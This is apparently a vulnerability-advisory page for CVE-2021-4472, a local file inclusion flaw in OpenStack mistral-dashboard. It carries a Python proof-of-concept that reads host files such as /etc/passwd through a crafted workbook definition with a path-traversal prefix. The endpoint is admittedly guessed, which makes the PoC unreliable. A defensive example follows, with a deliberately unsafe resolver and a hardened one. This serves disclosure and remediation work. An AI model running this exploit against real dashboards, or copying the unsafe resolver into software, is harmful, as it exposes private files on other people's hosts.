Security Vulnerability Report
CVE-2021-4472 CVSS 6.5 MEDIUM

CVE-2021-4472

Published: 2025-11-26 19:15:46
Last Modified: 2026-04-15 00:35:42

Description

The mistral-dashboard plugin for OpenStack has a local file inclusion vulnerability through the 'Create Workbook' feature that may result in disclosure of the contents of arbitrary local files on the dashboard host.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

OpenStack mistral-dashboard, versions before the fix (review 800952)
OpenStack python-mistralclient, versions before the fix (review 800950)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import sys

# CVE-2021-4472 PoC - Local File Inclusion in OpenStack Mistral-dashboard
# Target: OpenStack Mistral-dashboard 'Create Workbook' feature
# Note: the endpoint path and the X-Auth-Token header below are this PoC's
# own assumptions; confirm them against the target's dashboard routes and
# session handling before relying on the result.


def exploit_lfi(target_url, token, file_path):
    """Exploit Local File Inclusion vulnerability in mistral-dashboard."""
    headers = {
        'X-Auth-Token': token,
        'Content-Type': 'application/json',
    }
    # Malicious payload: the workbook 'definition' field carries a file reference
    payload = {
        'name': 'test_workbook',
        'definition': f'file://{file_path}',
    }
    endpoint = f'{target_url}/api/mistral/workbooks'
    try:
        response = requests.post(endpoint, json=payload, headers=headers, timeout=10)
        if response.status_code == 200:
            print(f'[+] Successfully read file: {file_path}')
            print(response.text)
            return True
        print(f'[-] Failed with status: {response.status_code}')
        return False
    except requests.exceptions.RequestException as e:
        print(f'[-] Error: {e}')
        return False


if __name__ == '__main__':
    # Three positional arguments: target URL, auth token, file path
    if len(sys.argv) < 4:
        print('Usage: python cve-2021-4472.py <target_url> <token> <file_path>')
        print('Example: python cve-2021-4472.py https://openstack.example.com <token> /etc/passwd')
        sys.exit(1)
    target = sys.argv[1]
    token = sys.argv[2]
    file_path = '../../../' + sys.argv[3]  # Path traversal prefix
    exploit_lfi(target, token, file_path)
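The description and the PoC above both turn on one CWE-73 pattern: a string that the dashboard received from a web form is handed to a helper that treats any string naming a readable local file (or URL) as a file to read, so the dashboard host's own files end up in the workbook definition sent to the API and echoed back. The block below is an added, constructed example written for this page; it is not code from mistral-dashboard or python-mistralclient. The function names, the fake API stand-in and the canary file are assumptions made for illustration. It shows the unsafe resolver beside a hardened split (explicit file reads for trusted callers, verbatim content for web input) and a small probe that reports whether a given resolver leaks a local file, which you can point at a real client's helper on an installed host to check whether it is still vulnerable.

```python
"""Models CWE-73 as it applies to CVE-2021-4472: a helper that silently turns a
string into the contents of whatever local file (or URL) the string names.
Constructed example; not code from mistral-dashboard or python-mistralclient."""
import os
import tempfile
from urllib import parse, request


def vulnerable_get_contents_if_file(contents_or_file_name: str) -> str:
    # Unsafe "be helpful" pattern (assumed model of the bug): if the argument
    # names a readable file or a URL, return what it points at; otherwise
    # assume it is already content. Acceptable for a CLI reading the
    # operator's own files, fatal when the string came from an HTTP form and
    # this code runs on the dashboard host.
    try:
        if parse.urlparse(contents_or_file_name).scheme:
            url = contents_or_file_name  # e.g. file:///etc/passwd, or http:// (SSRF)
        else:
            path = os.path.abspath(contents_or_file_name)
            url = parse.urljoin("file:", request.pathname2url(path))
        return request.urlopen(url).read().decode("utf-8")
    except Exception:
        return contents_or_file_name


def read_definition_file(path: str) -> str:
    # Hardened split, part 1: reading a file is an explicit, separately named
    # operation that only trusted callers (the operator's own CLI) invoke.
    with open(path, encoding="utf-8") as fh:
        return fh.read()


def fake_mistral_api_create(body: dict) -> dict:
    # Stand-in for the Mistral REST API (assumption): echoes the definition
    # back, which is what lets a leaked file body reach the requester.
    return {"name": "wb", "definition": body["definition"]}


def create_workbook_from_web(definition_text: str) -> dict:
    # Hardened split, part 2: anything arriving from the web form is workbook
    # text and is forwarded verbatim. It is never resolved as a path or URL,
    # so "/etc/passwd" reaches the API as the literal string and fails there
    # as invalid YAML instead of being read on the dashboard host.
    if not definition_text.strip():
        raise ValueError("empty workbook definition")
    return fake_mistral_api_create({"definition": definition_text})


def probe_for_lfi(resolver) -> bool:
    """Return True if `resolver` turns a path into that file's contents.

    Writes a random canary to a temp file, passes only the path to
    `resolver`, and checks whether the canary comes back. On a real host,
    pass the installed client's path-or-content helper to confirm whether
    the unsafe behaviour is still present.
    """
    canary = "CANARY-" + os.urandom(4).hex()
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as fh:
        fh.write(canary)
        path = fh.name
    try:
        return canary in resolver(path)
    finally:
        os.unlink(path)


if __name__ == "__main__":
    print("vulnerable helper leaks files:",
          probe_for_lfi(vulnerable_get_contents_if_file))
    print("hardened web path leaks files:",
          probe_for_lfi(lambda s: create_workbook_from_web(s)["definition"]))
```

The probe is deliberately indirect: it never passes file contents, only a path, so a resolver that returns the canary must have opened the file itself. Inline YAML such as `version: '2.0'` passes through the vulnerable helper unchanged (urlopen fails and the fallback returns the input), which is why the bug went unnoticed in normal use.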

References

https://access.redhat.com/security/cve/CVE-2021-4472
https://bugs.launchpad.net/horizon/+bug/1931558
https://bugzilla.redhat.com/show_bug.cgi?id=2417321
https://review.opendev.org/c/openstack/mistral-dashboard/+/800952
https://review.opendev.org/c/openstack/python-mistralclient/+/800950
https://lists.debian.org/debian-lts-announce/2025/12/msg00002.html
https://lists.debian.org/debian-lts-announce/2025/12/msg00003.html

Raw JSON Data

JSON
{"cve": {"id": "CVE-2021-4472", "sourceIdentifier": "[email protected]", "published": "2025-11-26T19:15:46.387", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The mistral-dashboard plugin for openstack has a local file inclusion vulnerability through the 'Create Workbook' feature that may result in disclosure of arbitrary local files content."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-73"}]}], "references": [{"url": "https://access.redhat.com/security/cve/CVE-2021-4472", "source": "[email protected]"}, {"url": "https://bugs.launchpad.net/horizon/+bug/1931558", "source": "[email protected]"}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2417321", "source": "[email protected]"}, {"url": "https://review.opendev.org/c/openstack/mistral-dashboard/+/800952", "source": "[email protected]"}, {"url": "https://review.opendev.org/c/openstack/python-mistralclient/+/800950", "source": "[email protected]"}, {"url": "https://lists.debian.org/debian-lts-announce/2025/12/msg00002.html", "source": "af854a3a-2127-422b-91ae-364da2661108"}, {"url": "https://lists.debian.org/debian-lts-announce/2025/12/msg00003.html", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}